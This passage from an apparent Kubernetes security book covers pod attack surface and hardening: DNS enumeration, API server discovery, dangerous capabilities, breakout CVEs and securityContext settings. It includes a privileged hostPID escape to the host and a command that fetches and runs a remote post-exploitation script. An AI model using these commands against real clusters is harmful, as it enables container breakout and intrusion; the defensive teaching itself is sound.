        memory: 128Mi
      requests:
        cpu: 100m
        memory: 64Mi

DNS

By default Kubernetes DNS servers provide all records for services across the cluster, preventing namespace segregation unless deployed individually per-namespace or domain.

Tip

CoreDNS supports policy plugins, including Open Policy Agent, to restrict access to DNS records and defeat the following enumeration attacks.

The default Kubernetes CoreDNS installation leaks information about its services, and offers an attacker a view of all possible network endpoints. Of course they may not all be accessible due to network policy.

DNS enumeration can be performed against a default, unrestricted CoreDNS installation. To retrieve all services in the cluster namespace:

root@hack-3-fc58fe02:/ [0]# dig +noall +answer srv any.any.svc.cluster.local | sort --human-numeric-sort --key 7
any.any.svc.cluster.local. 30   IN      SRV     0 6 53 kube-dns.kube-system.svc.cluster.local.
any.any.svc.cluster.local. 30   IN      SRV     0 6 80 frontend-external.default.svc.cluster.local.
any.any.svc.cluster.local. 30   IN      SRV     0 6 80 frontend.default.svc.cluster.local.
any.any.svc.cluster.local. 30   IN      SRV     0 6 443 kubernetes.default.svc.cluster.local.
any.any.svc.cluster.local. 30   IN      SRV     0 6 3550 productcatalogservice.default.svc.cluster.local.
# ...

For all service endpoints and names:

root@hack-3-fc58fe02:/ [0]# dig +noall +answer srv any.any.any.svc.cluster.local | sort --human-numeric-sort --key 7
any.any.any.svc.cluster.local. 30 IN    SRV     0 3 53 192-168-155-129.kube-dns.kube-system.svc.cluster.local.
any.any.any.svc.cluster.local. 30 IN    SRV     0 3 53 192-168-156-130.kube-dns.kube-system.svc.cluster.local.
any.any.any.svc.cluster.local. 30 IN    SRV     0 3 3550 192-168-156-133.productcatalogservice.default.svc.cluster.local.
any.any.any.svc.cluster.local. 30 IN    SRV     0 3 5050 192-168-156-131.checkoutservice.default.svc.cluster.local.
any.any.any.svc.cluster.local. 30 IN    SRV     0 3 6379 192-168-156-136.redis-cart.default.svc.cluster.local.
any.any.any.svc.cluster.local. 30 IN    SRV     0 3 6443 10-0-1-1.kubernetes.default.svc.cluster.local.
any.any.any.svc.cluster.local. 30 IN    SRV     0 3 7000 192-168-156-135.currencyservice.default.svc.cluster.local.
# ...

To return an IPv4 address based on the query:

root@hack-3-fc58fe02:/ [0]# dig +noall +answer 1-3-3-7.default.pod.cluster.local
1-3-3-7.default.pod.cluster.local. 23 IN A      1.3.3.7

Kubernetes API server service IP information is mounted into the pod’s environment by default:

root@test-pd:~ [0]# env | grep KUBE
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_SERVICE_PORT=443
KUBERNETES_PORT_443_TCP=tcp://10.7.240.1:443
KUBERNETES_PORT_443_TCP_PROTO=tcp
KUBERNETES_PORT_443_TCP_ADDR=10.7.240.1
KUBERNETES_SERVICE_HOST=10.7.240.1
KUBERNETES_PORT=tcp://10.7.240.1:443
KUBERNETES_PORT_443_TCP_PORT=443

root@test-pd:~ [0]# curl -k https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT}/version
{
  "major": "1",
  "minor": "19+",
  "gitVersion": "v1.19.9-gke.1900",
  "gitCommit": "008fd38bf3dc201bebdd4fe26edf9bf87478309a",
# ...

The response matches the API server’s /version endpoint.

Tip

Detect Kubernetes API servers with this nmap script and the following function:

nmap-kube-apiserver() {
  local REGEX="major.*gitVersion.*buildDate"
  local ARGS="${@:-$(kubectl config view --minify | awk '/server:/{print $2}' | sed -E -e 's,^https?://,,' -e 's,:, -p ,g')}"

  nmap --open -d 
    --script=http-get 
    --script-args "
      http-get.path=/version, 
      http-get.match="${REGEX}", 
      http-get.showResponse, 
      http-get.forceTls 
    " 
    ${ARGS}
}

Pod security context

This pod is running with an empty securityContext, which means that without admission controllers mutating the configuration at deployment time, the container can run a root-owned process and has all capabilities available to it:

  securityContext: {}

Exploiting the capability landscape involves an understanding of the kernel’s flags, and Stefano Lanaro’s guide provides a comprehensive overview.

Different capabilities may have particular impact on a system, and CAP_SYS_ADMIN and CAP_BPF are particularly enticing to an attacker. Notable capabilities you should be cautious about granting include:

  • CAP_DAC_OVERRIDE, CAP_CHOWN, CAP_DAC_READ_SEARCH, CAP_FORMER, CAP_SETFCAP: bypass filesystem permissions

  • CAP_SETUID, CAP_SETGID: become the root user

  • CAP_NET_RAW: read network traffic

  • CAP_SYS_ADMIN: filesystem mount permission

  • CAP_SYS_PTRACE: all-powerful debugging of other processes

  • CAP_SYS_MODULE: load kernel modules to bypass controls

  • CAP_PERFMON, CAP_BPF: access deep-hooking BPF systems

These are the precursors for many container breakouts. As Figure 2-11, Brad Geesaman points out, processes want to be free! And an adversary will take advantage of anything within the pod they can use to escape.

Note

CAP_NET_RAW is enabled by default in runc, and enables UDP (which bypasses TCP service meshes like Istio), ICMP, and ARP poisoning attacks. Aqua found DNS poisoning attacks against Kubernetes DNS, and the net.ipv4.ping_group_range sysctl flag means it should be dropped when needed for ICMP.

Some container breakouts requiring root and/or CAP_SYS_ADMIN, CAP_NET_RAW, CAP_BPF, or CAP_SYS_MODULE to function:

  • /proc/self/exe (described in Chapter 5)

  • Subpath volume mount traversal (described in Chapter 5)

  • CVE-2016-5195 (read-only memory copy-on-write race condition, aka DirtyCow, and detailed in “Architecting Containerised Applications for Resilience”).

  • CVE-2020-14386 (an unprivileged memory corruption bug that requires CAP_NET_RAW)

  • CVE-2021-30465 (runc mount destinations symlink-exchange swap to mount outside the rootfs, limited by use of unprivileged user)

  • CVE-2021-22555 (Netfilter heap out-of-bounds write that requires CAP_NET_RAW)

  • CVE-2021-31440 (eBPF out of bounds access to the Linux kernel requiring root or CAP_BPF, and CAPS_SYS_MODULE)

  • @andreyknvl kernel bugs and core_pattern escape

When there’s no breakout, root capabilities are still required for a number of other attacks, such as CVE-2020-10749 (Kubernetes CNI plugin MitM attacks via IPv6 rogue router advertisements)

Tip

The excellent Compendium of Container Escapes goes into more detail on some of these attacks.

We enumerate the options available in a securityContext for a pod to defend itself from hostile containers at in the runtime policies section.

Pod service accounts

Service Accounts are JWTs (JSON Web Tokens) and are used for authorisation by a pods. The default service account shouldn’t be given any permissions, and by default comes with no authorisation.

A pod’s serviceAccount configuration defines its access privileges with the API server, see the server accounts section for the details. The service account is mounted into all pod replicas, and which share the single “workload identity”.

  serviceAccount: default
  serviceAccountName: default

Segregating duty in this way reduces the blast radius if a pod is compromised: limiting an attacker post-intrusion is a primary goal of policy controls.

Scheduler and tolerations

The scheduler is responsible for allocating a pod workload to a node. It looks as follows:

  schedulerName: default-scheduler
  tolerations:
  - effect: NoExecute
    key: node.kubernetes.io/not-ready
    operator: Exists
    tolerationSeconds: 300
  - effect: NoExecute
    key: node.kubernetes.io/unreachable
    operator: Exists
    tolerationSeconds: 300

A hostile scheduler could conceivably exfiltrate data or workloads from the cluster, but requires the cluster to be compromised in order to add it to the control plane. It would be easier to schedule a privileged container and root the control plane kubelets.

Pod volume definitions

Here we are using a bound service account token, defined in YAML as a projected service account token (instead of a standard service account). The Kubelet protects this against exfiltration by regularly rotating it (configured for every 3600 seconds, or one hour), so it’s only of limited use if stolen. An attacker with persistence is still able to use this value, and can observe it rotating, so this only protects the service account after the attack has completed.

  volumes:
  - name: kube-api-access-p282h
    projected:
      defaultMode: 420
      sources:
      - serviceAccountToken:
          expirationSeconds: 3600
          path: token
      - configMap:
          items:
          - key: ca.crt
            path: ca.crt
          name: kube-root-ca.crt
      - downwardAPI:
          items:
          - fieldRef:
              apiVersion: v1
              fieldPath: metadata.namespace
            path: namespace

Volumes are a rich source of potential data for an attacker, and you should ensure that standard security practices like discretionary access control (DAC, e.g. files and permissions) is correctly configured.

Tip

The downwardAPI reflects Kubernetes-level values into the containers in the pod, and is useful to expose things like the pod’s name, namespace, UID, and labels and annotations into the container. It’s capabilities are listed in the docs.

The container is just Linux and will not protect incorrectly configured data.

Pod network status

Network information about the pod is useful to debug containers without services, or that aren’t responding as they should, but an attacker might use this information to connect directly to a pod without scanning the network.

status:
  hostIP: 10.0.1.3
  phase: Running
  podIP: 192.168.155.130
  podIPs:
  - ip: 192.168.155.130

Using the security context correctly

A pod is more likely to be compromised if a securityContext is not configured, or is too permissive. It is your most effective tool to prevent container breakout.

After gaining an RCE into a running pod, the security context is the first line of defensive configuration you have available to a defender. It has access to kernel switches that can be set individually. Additional Linux Security Modules can be configured with fine-grained policies that prevent hostile applications taking advantage of your systems.

Docker’s containerd has a default seccomp profile that has prevented some zero-day attacks against the container runtime by blocking system calls in the kernel. From Kubernetes v1.22 you should enable this by default for all runtimes with the --seccomp-default Kubelet flag. In some cases workloads may not run with the default profile: observability or security tools may require low-level kernel access. These workloads should have custom seccomp profiles written (rather than resorting to running them Unconfined, which allows any system call).

Here’s an example of a fine-grained seccmop profile loaded from the host’s filesystem under /var/lib/kubelet/seccomp:

  securityContext:
    seccompProfile:
      type: Localhost
      localhostProfile: profiles/fine-grained.json

Seccomp is for system calls, but SELinux and AppArmor can monitor and enforce policy in userspace too, protecting files, directories, and devices.

SELinux configuration is able to block most container breakouts (excluding with a label-based approach to filesystem and process access) as it doesn’t allow containers to write anywhere but their own filesystem, nor to read other directories, and comes enabled on Openshift and Red Hat Linuxes.

AppArmor can similarly monitor and prevent many attacks in Debian Linuxes. If AppArmor is enabled then cat /sys/module/apparmor/parameters/enabled returns Y, and it can be used in pod definitions:

metadata:
  annotations:
    container.apparmor.security.beta.kubernetes.io/hello: localhost/k8s-apparmor-example-deny-write

The privileged flag was quoted as being “the most dangerous flag in the history of computing” by Liz Rice, but why are privileged containers so dangerous? Because they leave the process namespace enabled to give the illusion of containerisation, but actually disable all security features.

“Privileged” is a specific securityContext configuration: all but the process namespace is disabled, virtual filesystems are unmasked, LSMs are disabled, and all capabilities are granted.

Running as a non-root user without capabilities, and setting AllowPrivilegeEscalation to false provides a robust protection against many privilege escalations.

spec:
  containers:
  - image: controlplane/hack
    securityContext:
      allowPrivilegeEscalation: false

The granularity of security contexts means each property of the configuration must be tested to ensure it is not set: as a defender by configuring admission control and testing YAML; as an attacker with a dynamic test (or amicontained) at runtime.

Tip

We explore how to detect privileges inside a container later in this chapter.

Sharing namespaces with the host also reduces the isolation of the container and opens it to greater potential risk. Any mounted filesystems effectively add to the mount namespace.

Ensure your pods ``securityContext``’s are correct and your systems will be safer against known attacks.

Enhancing the securityContext with Kubesec

Kubesec is a simple tool to validate the security of a Kubernetes resource.

It returns a risk score for the resource, and advises on how to tighten the security context:

$ cat <<EOF > kubesec-test.yaml
apiVersion: v1
kind: Pod
metadata:
  name: kubesec-demo
spec:
  containers:
  - name: kubesec-demo
    image: gcr.io/google-samples/node-hello:1.0
    securityContext:
      readOnlyRootFilesystem: true
EOF

$ docker run -i kubesec/kubesec:2.11.1 scan - < kubesec-test.yaml
[
  {
    "object": "Pod/kubesec-demo.default",
    "valid": true,
    "fileName": "STDIN",
    "message": "Passed with a score of 1 points",
    "score": 1,
    "scoring": {
      "passed": [
        {
          "id": "ReadOnlyRootFilesystem",
          "selector": "containers[] .securityContext .readOnlyRootFilesystem == true",
          "reason": "An immutable root filesystem can prevent malicious binaries being added to PATH and inc
rease attack cost",
          "points": 1
        }
      ],
      "advise": [
        {
          "id": "ApparmorAny",
          "selector": ".metadata .annotations ."container.apparmor.security.beta.kubernetes.io/nginx"",
          "reason": "Well defined AppArmor policies may provide greater protection from unknown threats. WARNING: NOT PRODUCTION READY",
          "points": 3
        },
        {
          "id": "ServiceAccountName",
          "selector": ".spec .serviceAccountName",
          "reason": "Service accounts restrict Kubernetes API access and should be configured with least privilege",
          "points": 3
        },
        {
          "id": "SeccompAny",
          "selector": ".metadata .annotations ."container.seccomp.security.alpha.kubernetes.io/pod"",
          "reason": "Seccomp profiles set minimum privilege and secure against unknown threats",
          "points": 1
        },
# ...

Kubesec.io documents practical changes to make to your security context, and we’ll document some of them here.

Tip

Shopify’s excellent kubeaudit provides similar functionality for all resources in a cluster.

Hardened securityContext

The NSA published a Kubernetes Hardening Guidance document that recommends a hardened set of securityContext standards. It recommends scanning for vulnerabilities and misconfigurations, least privilege, good RBAC and IAM, network firewalling and encryption, and “to periodically review all Kubernetes settings and use vulnerability scans to help ensure risks are appropriately accounted for and security patches are applied”.

Assigning least privilege to a container in a pod is the responsibility of the securityContext

Note

PodSecurityPolicy maps onto the configuration flags available in a Pod or Container’s securityContext

image 2021 08 04 08 41 59 780
image 2021 08 04 08 45 07 522

Let’s explore these in more detail using the kubesec static analysis tool, and the selectors it uses to interrogate your Kubernetes resources:

  • containers[] .securityContext .privileged

A privileged container running is potentially a bad day for your security team. Privileged containers disable namespaces (except process) and LSMs, grant all capabilities, expose the host’s devices through /dev, and generally make things insecure by default. This is the first thing an attacker looks for in a newly compromised pod.

  • .spec .hostPID

hostPID allows traversal from the container to the host through the /proc filesystem, which symlinks other processes’ root filesystems. To read from the host’s process namespace privileged is needed as well:

user@host $ kubectl run privileged-and-hostpid --restart=Never -ti --rm 
  --image lol --overrides 
  '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["/bin/bash"],"stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent","securityContext":{"privileged":true}}]}}' 1

/ $ grep PRETTY_NAME /etc/*release* 2
PRETTY_NAME="Alpine Linux v3.13"

/ $ ps faux | head 3
PID   USER     TIME  COMMAND
    1 root      0:07 /usr/lib/systemd/systemd noresume noswap cros_efi
    2 root      0:00 [kthreadd]
    3 root      0:00 [rcu_gp]
    4 root      0:00 [rcu_par_gp]
    6 root      0:00 [kworker/0:0H-kb]
    9 root      0:00 [mm_percpu_wq]
   10 root      0:00 [ksoftirqd/0]
   11 root      1:33 [rcu_sched]
   12 root      0:00 [migration/0]

/ $ grep PRETTY_NAME /proc/1/root/etc/*rel* 4
/proc/1/root/etc/os-release:PRETTY_NAME="Container-Optimized OS from Google"
1

start a privileged container and share the host process namespace

2

check the distribution version inside the container

3

verify we’re in the host’s process namespace (we can see PID 1, and kernel helper processes)

4

check the distribution version of the host, via the /proc filesystem

Note

Without privileged, the host process namespac is inaccessible to root in the container:

/ $ grep PRETTY_NAME /proc/1/root/etc/*release*
grep: /proc/1/root/etc/*release*: Permission denied

In this case the attacker is limited to searching the filesystem or memory as their UID allows, hunting for key material or sensitive data.

  • .spec .hostNetwork

Host networking access allows us to sniff traffic or send fake traffic over the host adapter (but only if we have permission to do so, enabled by root and CAP_NET_RAW or CAP_NET_ADMIN), and evade network policy (which depends on traffic originating from the expected source IP of the adapter in the pod’s network namespace).

It also grants access to services bound to the host’s loopback adapter (localhost in the root network namespace) that traditionally was considered a security boundary. Server Side Request Forgery (SSRF) attacks have reduced the incidence of this pattern, but it may still exist (Kubernetes’ API server --insecure-port used this pattern until it was deprecated in v1.10 and finally removed in v1.20).

  • .spec .hostAliases

Permits pods to override their local /etc/hosts files. This may have more operational implications (like not being updated in a timely manner and causing an outage) than security connotations.

  • .spec .hostIPC

Gives the pod access to the host’s Interprocess Communication namespace, where it may be able to interfere with trusted processes on the host. It’s likely this will enable simple host compromise via /usr/bin/ipcs or files in shared memory at /dev/shm.

  • containers[] .securityContext .runAsNonRoot

The root user has special permissions and privileges in a Linux system, and this is no different within a container (although they’re less).

Preventing root from owning the procesess inside the container is a simple and effective security measure. It stops many of the container breakout attacks listed in this book, and adheres to standard and established Linux security practice.

  • containers[] .securityContext .runAsUser > 10000

In addition to preventing root running processes, enforcing high UIDs for containerised processes lowers the risk of breakout without user namespaces: if the user in the conatiner (e.g. 12345) has an equivalent UID on the host (that is, also 12345), and the user in the container is able to reach them through mounted volume or shared namespace, then resources may accidentally be shared and allow container breakout (e.g. filesystem permissions and authorisation checks).

  • containers[] .securityContext .readOnlyRootFilesystem

Immutability is not a security boundary as code can be downloaded from the internet and run by an interpreter (such as Bash, PHP, and Java) without using the filesystem, as the bashark post-exploitation toolkit shows:

root@r00t:/tmp [0]# source <(curl -s 
  https://raw.githubusercontent.com/redcode-labs/Bashark/master/bashark.sh)

__________               .__                  __               ________     _______
\______   \_____    _____|  |__ _____ _______|  | __ ___  __   \_____         _  
 |    |  _/\__    /  ___/  |  \__  \_  __   |/ /   / /    /  ____/    /  /_  
 |    |    / __ \_\___ |   Y  / __ |  | /    <      /    /             \_/   
 |______  /(____  /____  >___|  (____  /__|  |__|_    \_/ /  \_______  / \_____  /
        /      /     /     /     /           /       /          / /       /



[*] Type 'help' to show available commands

bashark_2.0$

Filesystem locations like /tmp and /dev/shm will probably always be writable to support application behaviour, and so read-only filesystems cannot be relied upon as a security boundary. Immutability will prevent against some drive-by and automated attacks, but is not a robust security boundary.

Intrusion detection tools such as falco and tracee can detect new Bash shells spawned in a container (or any non-allowlisted applications). Additionally tracee can detect in-memory execution of malware that attempts to hide itself by observing /proc/pid/maps for memory that was once writeable but is now executable.

Note

We look at Falco in more detail in Chapter 9.

  • containers[] .securityContext .capabilities .drop | index("ALL")

You should always drop all capabilities and only re-add those that your application needs to operate.

  • containers[] .securityContext .capabilities .add | index("SYS_ADMIN")

The presence of this capability is a red flag: try to find another way to deploy any container that requires this, or deploy into a dedicated namespace with custom security rules to limit the impact of compromise.

  • containers[] .resources .limits .cpu, .memory

Limiting the total amount of memory available to a container prevents denial of service attacks taking out the host machine, as the container dies first,

  • containers[] .resources .requests .cpu, .memory

Requesting resources helps the scheduler to “bin pack” resources effectively, and doesn’t have any security connotations further to a hostile API client trying to squeeze more pods onto a specific node.

  • .spec .volumes[] .hostPath .path

A writable /var/run/docker.sock host mount allows breakout to the host. Any filesystem that an attacker can write a symlink to is vulnerable, and an attacker can use that path to explore and exfiltrate from the host.

Into the eye of the storm

The Captain and crew have had a fruitless raid, but this is not the last we will hear of their escapades.

If we zoom in on the relationship between a single pod and the host in Figure 2-12, we can see the services offered to the container by the Kubelet and potential security boundaries that may keep an adversary at bay.

Pod Architecture
Figure 2-12. Pod architecture

As we progress through this book, we will see how these components interact, and we will witness Captain Hashjack’s efforts to exploit them.

Conclusion

There are multiple layers of configuration to secure for a pod to be used safely, and the workloads you run are the soft underbelly of Kubernetes security.

The pod is the first line of defence and the most important part of a cluster to protect. Application code changes frequently and is likely to be a source of potentially exploitable bugs.

To extend the anchor and chain metaphor, a cluster is only a strong as its weakest link. In order to be provably secure, you must use robust configuration testing, preventative control and policy in the pipeline and admission control, and runtime intrusion detection—as nothing is infallible.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset